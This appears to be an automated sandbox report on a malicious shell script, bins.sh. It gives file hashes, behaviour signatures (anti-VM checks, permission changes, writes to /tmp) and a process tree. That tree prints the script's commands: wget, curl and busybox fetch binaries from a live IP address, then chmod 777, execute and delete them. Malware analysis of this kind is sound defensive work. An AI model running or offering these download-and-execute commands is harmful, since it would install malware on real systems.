Overview

overview

9

Static

static

1

bins.sh

ubuntu-18.04-amd64

9

bins.sh

debian-9-armhf

7

bins.sh

debian-9-mips

8

bins.sh

debian-9-mipsel

8

Analysis

  • max time kernel
    3s
  • max time network
    30s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    21-11-2024 10:56

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    d2d1ede0b3c7ba6a1e47da01f8fd982e

  • SHA1

    36a1960017d2e69ad34ffcd58356cd98d806deab

  • SHA256

    e417d8ef5673d87d5b11f06ddab0035af5c4a77b3338ab5dc1a9500c7fd0bdba

  • SHA512

    8026c23c4a3243d724e6af46b6966aa34cbaa59e1e684bb770013f07594f370e49a35d1b440eda48e49948b30cf7c6e0abc84083a31305d4acb7d84906043f1e

  • SSDEEP

    192:ugUL/nPKWF9aaG1p5KyCT3+8njd7al1p5KyOzgUR/nPKW6:c/nPKWF9aabT3+8h7aKz/nPKW6

Score
7/10
antivmdefense_evasiondiscovery

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 1 IoCs
  • Checks CPU configuration 1 TTPs 1 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

    antivm
  • Reads runtime system information 2 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • Writes file to tmp directory 3 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:662
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:664
        • /usr/bin/wget
          wget http://216.126.231.240/bins/Q6q2dbdYHJ2nWHtbutuv1pF7dIWx1uIDOH
          2⤵
          • Writes file to tmp directory
          PID:666
        • /usr/bin/curl
          curl -O http://216.126.231.240/bins/Q6q2dbdYHJ2nWHtbutuv1pF7dIWx1uIDOH
          2⤵
          • Checks CPU configuration
          • Reads runtime system information
          • Writes file to tmp directory
          PID:690
        • /bin/busybox
          /bin/busybox wget http://216.126.231.240/bins/Q6q2dbdYHJ2nWHtbutuv1pF7dIWx1uIDOH
          2⤵
          • Writes file to tmp directory
          PID:692
        • /bin/chmod
          chmod 777 Q6q2dbdYHJ2nWHtbutuv1pF7dIWx1uIDOH
          2⤵
          • File and Directory Permissions Modification
          PID:697
        • /tmp/Q6q2dbdYHJ2nWHtbutuv1pF7dIWx1uIDOH
          ./Q6q2dbdYHJ2nWHtbutuv1pF7dIWx1uIDOH
          2⤵
          • Executes dropped EXE
          PID:698
        • /bin/rm
          rm Q6q2dbdYHJ2nWHtbutuv1pF7dIWx1uIDOH
          2⤵
            PID:701
          • /usr/bin/wget
            wget http://216.126.231.240/bins/3yb5zbu6YTXPCtjWcaitOxtMWOV9GkBsby
            2⤵
              PID:702

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • /tmp/Q6q2dbdYHJ2nWHtbutuv1pF7dIWx1uIDOH
            Filesize

            111KB

            MD5

            701e7a55a4f3650f5feee92a9860e5fc

            SHA1

            6ce4a7f0dc80fe557a0ace4de25e6305af221ed4

            SHA256

            ff851250b0bd7e6f2c445b08d858d840b554caf75a37ada2a970ea4d317ba588

            SHA512

            7352517b4af3b0cfe1cc814accf18e6254532f33dee274279bd499b6748aa0ed044c9429d6df0eb07ff0292cd0f9388ce44d278e0c562e6e57110b28a66a5f11

            Download Submit